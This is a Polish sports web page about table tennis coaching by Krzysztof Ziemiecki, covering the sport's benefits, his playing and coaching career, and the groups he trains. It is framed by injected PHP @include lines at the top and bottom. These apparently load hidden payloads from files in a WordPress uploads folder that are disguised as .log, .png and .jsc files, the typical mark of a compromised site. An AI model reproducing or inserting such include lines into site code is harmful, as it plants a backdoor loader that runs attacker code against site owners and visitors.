@include "wp-content/uploads/gravity_forms/f/c/h/c/include/7179.log"; @include "wp-content/uploads/gravity_forms/a/b/a/g/include/7390.png"; @include "wp-content/uploads/gravity_forms/f/c/h/c/include/7179.log";
Tenis stołowy | VERTE SPORT

Tenis stołowy

Wspaniały sposób by zadbać o zdrowie zarówno fizyczne jak i psychiczne. Tenis stołowy, poza oczywistymi korzyściami dla naszego ciała, jest dyscypliną świetnie wpływającą na umysł. Uwalnia od stresu, niezwykle poprawia koordynację ciała, refleks a nawet pewne strefy naszej inteligencji.

Co istotne tenis stołowy jest sportem dla każdego! Nie jest kontaktowy, jest łagodny dla stawów i wyjątkowo mało kontuzyjny. Zapraszamy!

Dzień dobry, nazywam się Krzysztof Ziemiecki i jestem zawodowym trenerem tenisa stołowego.

Tenisem stołowym zajmuję się od ponad 50 lat. Swoją sportową przygodę rozpocząłem w już nieistniejącym klubie „Tęcza” w Łodzi, a następnie w K.S. „Włókniarz”. W kategoriach młodzieżowych odnosiłem dobre wyniki w rozgrywkach ogólnopolskich. W kategorii seniorów byłem zawodnikiem I i II Ligii PZTS.

W 1982 roku ukończyłem studia trenerskie na Akademii Wychowania Fizycznego w Gdańsku, a następnie rozpocząłem pracę jako zawodowy trener.

Pracuję zarówno w Polsce, trenując zawodników w różnych grupach wiekowych, jak i w Niemczech, gdzie zawodowi gracze Bundesligi ćwiczą pod moim okiem.

KARIERA ZAWODNICZA
Zawodnik I i II ligi Polskiego Związku Tenisa Stołowego.

KARIERA MIĘDZYNARODOWA
Od wielu lat trenuję zawodników niemieckiej ligi w klubach SV Pluederhausen, SV Remshalden oraz VFL Winterbach.

  • TRENING AMATORSKI – kobiety, mężczyźni
  • DLA ZAWODOWCÓW – trening wyczynowy, przygotowanie do zawodów
  • DLA MŁODYCH – dzieci, młodzież
  • DLA OŚWIATY – dzieci, młodzież
  • NIEPEŁNOSPRAWNI – dorośli, dzieci i młodzież
@include "wp-content/uploads/gravity_forms/h/e/h/f/include/0209.jsc";